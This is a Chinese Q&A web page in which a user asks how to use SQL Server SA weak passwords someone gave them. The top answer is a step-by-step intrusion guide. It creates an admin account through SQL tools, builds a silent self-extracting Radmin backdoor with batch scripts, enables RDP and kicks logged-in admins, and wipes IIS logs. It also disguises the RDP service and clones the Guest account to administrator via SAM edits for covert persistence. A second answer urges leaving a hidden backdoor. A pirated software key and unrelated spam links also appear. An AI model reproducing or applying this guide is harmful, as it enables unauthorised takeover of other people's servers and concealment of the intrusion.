问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

别人送我几个SA弱口令,要怎么连接啊?

发布网友 发布时间:2022-05-03 09:04

我来回答

3个回答

热心网友 时间:2022-04-12 17:36

工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及 不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。

一.扫到SA弱口令(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet
开telnet服务
net user mint mint /add
添加用户mint密码为
mint net localgroup administrators mint /add
将帐号mint升级为管理员

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;

2、在本地设置服务端(一定要生成);

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg;

4、编写一个批处理,并命名为u.bat;

@echo offnet stop r_server

5、写第二个批处理,r.bat,内容为:

@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包;

7、将Rad.rar制作成自解压文件;

选择Default.sfx的自释放模块-->>高级自释放选项

-->>常规

释放路径:%systemroot%\\system32

安装程序:释放后运行:r.bat 释放前运行u.bat

-->>摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成。

四.用RADMIN客服端连接

上传文件到c:\\WINNT(XP是windows):

port.bat(如果是在XP下,这个要把里面的WINNT改为Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上传一个反弹后门RADMIN进入TELNET。

运行c:\\winnt\\3389.exe,重启肉鸡。

五.重启后用远程桌面远程器连上去

这里就有时会出现个问题。

使用3389登陆,发现登陆用户已满,不用怕,我们把他踢出去。

telnet对方ip,发现需要 NTLM 身份验证。我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

找到c:\\winnt\\system32\\cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint,telnet对方ip,直接可以登陆对方电脑了。

使用命令:

c:\\query user (查看对方目前终端登陆状况。)

运行命令:

c:\\logoff 1(踢出去一个管理者)

再用c:\\query user检查一便~~(这就是为什么不马上用1.bat了)

六.连上后..在cmd下运行

c:\\winnt\\log . 自己的IP .(擦PP)

c:\\winnet\\1.bat (删除覆盖查看当前在线用户文件)

七.打SA空口令补丁

程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)

-->>Windowst身位验证登陆

复制一下代码:SELMIS

if exists (select * from dbo.sysobjects where id
= object_id(N\’[dbo].[xp_cmdshell]\’)
and OBJECTPROPERTY(id, N\’IsExtendedProc\’)
= 1) exec sp_dropextendedproc N\’[dbo].[xp_cmdshell]\’GO

按F5(运行),关了退出SQL Server再用SQL Server身位验证进一次,退出(这是为了不留下记录)。
八.改3389端口和服务名称

修改服务器端的端口设置,注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp],PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。

第二个地方:

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。

要重启系统才能用新端口连。(不急..改了他的服务名再重启系统吧)

导出3389服务的

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]

的键值为mm.reg文件。编辑mm.reg文件,替换TermService为Alerter(错误警告服务..别的服务也行) 。再把第十行的"Description"="(这里是服务说明,改为你所换的服务说明,这里改为通知所选用户和计算机有关系统管理级警报。)"第十一行的"DisplayName"="(这里是服务名称,改为你所换的服务名称,这里改为Alerter)。保存,再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止)。

再在CMD下

CD c:\\winnt\\
system32 copy termsrv.exe service.exe
(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)
CD C:\\winnt sc \\\\127.0.0.1 config Alerter binpath=
c:\\winnt\\system32\\service.exe
(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)

九.注消后(注消比直接关要好些)用Radmin重启肉鸡

十.使用被禁用的帐户[Guest]登陆,删除自己开始建的帐号

1.使用psu.exe展开注册表到

HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users

用法:[psu -p regedit -i pid]

Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值。

如:psu –p regedit –i 157

将Guest克成管理员权限,克成管理员权限的方法:

找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的类型值。

在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)。

导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相应的类型值的数据),然后删除Guest的配置。

2.查看计算机管理中帐户列表,刷新这时候会出现错误[找不到帐户](跳过这步也行)。

3.将Guest的配置(二个REG文件导进注册表)。

4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]。

net user Guest ****
[修改密码]net user Guest /
active:yesnet user Guest /active:no[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用。

6.用Guest登陆后删除自己建的帐号。

net user mint /del

整个过程结束。

最后最好把RADMIN的服务也改了,多留个后门多条路,呵呵。整个过程全部结束,这机子就真正变成你的肉鸡了

热心网友 时间:2022-04-12 18:54

直接用sqltools连接就可以了,然后建立用户,至于开3389那就是个人爱好了一般的有SA弱口令的机器上,估计马、客户……不会少,你可以帮他清理一下,自己留一个隐蔽点的后门。把机器弄干净点,不要破坏和随意修改。很多朋友都认为SA弱口令的机器,就像菜市场,不必清除脚印,不过我个人认为还是清除的比较好一些,有时候,一些小的服务器,由于管理员懒,或者本身不是没有重要资料,所以不去修改密码或打补丁。并不代表他不看这些东西。如果比较稳定的服,可以花点心思帮他维护~。。~

热心网友 时间:2022-04-12 20:29

S一般别人给你弱口令的计算机都是有其他顾客的,所以你不要去登录了,那样只是徒劳
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
女生多大后可以不在长身高? 如何不用软件把手机投屏到电脑上手机屏幕怎样投放到电脑上 战时拒绝、故意延误军事订货罪既遂的处罚? 战时故意延误军事订货罪处罚标准 名师1+1导读方案:汤姆·索亚历险记目录 三星sm-g7200打开微信慢,无法正常收看,网速不慢。 笔记本电脑如何调亮屏幕亮度 大伙说说洗衣机要不要带烘干好 热烘干洗衣机怎么样 ef英语哪个好 漏洞 ftp (21/tcp) FTP弱口令: "anonymous/[空口令]" 怎么攻击它的服务器 一名成熟的职场人士,都该具备哪些过人的能力? 检测到远程桌面暴力破解,攻击者:185.193.88.75远程桌面弱口令攻击,攻击者:185.193.88.75? 在职场中,该怎么提升自己的能力? ftp入侵并且有个弱口令 在职场中,你认为最重要的能力是什么? 个人职场十大技能 如何通过FTP弱口令入侵后台 职场上,如何强化个人职场能力? 360弹出检测到服务器近期遇到多次攻击,发现弱口令攻击,已修改登录方式,请问这是什么情况? 职场人该具备的基本能力,都有哪些? 360提示发现弱口令攻击,这对普通电脑有影响吗? ~~~世界上有鬼的证据~~~ 这世界上有鬼,有什么证据? 世界上有鬼的证据 世界上有没有鬼的证据?如果有就带我去。 日本校园日本校园七大不可思议事件 日本校园七大不可思议事件 世界上有鬼的证据 (1)在美国科学家 日本校园七大不可思议事件世界上有鬼的证据 世界上有鬼的证据 (1)在美国科学家们做过一个实验。 他们找来一个人,将他催眠,他竟能说出自己的前生的 世界上有鬼的证据吗 如何防止sql2000弱口令攻击 EXCEL中使用高级筛选时,如果筛选条件是介于两个数之间,筛选条件怎么写? excel高级筛选大于70小于80怎么输入 在Excel中,进行高级筛选,筛选条件为金额介于30000到5000怎么做 excel高级筛选条件区域70到80之间怎么输入 高级筛选的条件区域怎么输入? 支付宝如何开通余额宝 顶级神婿叶辰有几个老婆? 《神级上门女婿》txt下载在线阅读全文,求百度网盘云资源 哪位大神有智能电脑定时重启与关机软件 V1.3 官方版软件百度云资源 有没有电脑定时开机的软件(不要说开机的时候设定,因为我的电脑没有这个功能) 主角叫叶辰的小说名字上门女婿后来飞升打败神兽就吸收它的能力可以变身成神兽的样子? 《神级女婿》by石头就是石头txt下载在线阅读全文,求百度网盘云资源 如何实现电脑定时开机?电脑定时开机软件有哪些? 电脑安装什么软件能自动定时开机? 有没有电脑定时开机软件(笔记本电脑的)? 电脑定时开机软件 从小草身上悟出人生的道理400作文 小草的启示作文四百五十字左右 从小草写一篇作文,要有启示!500字左右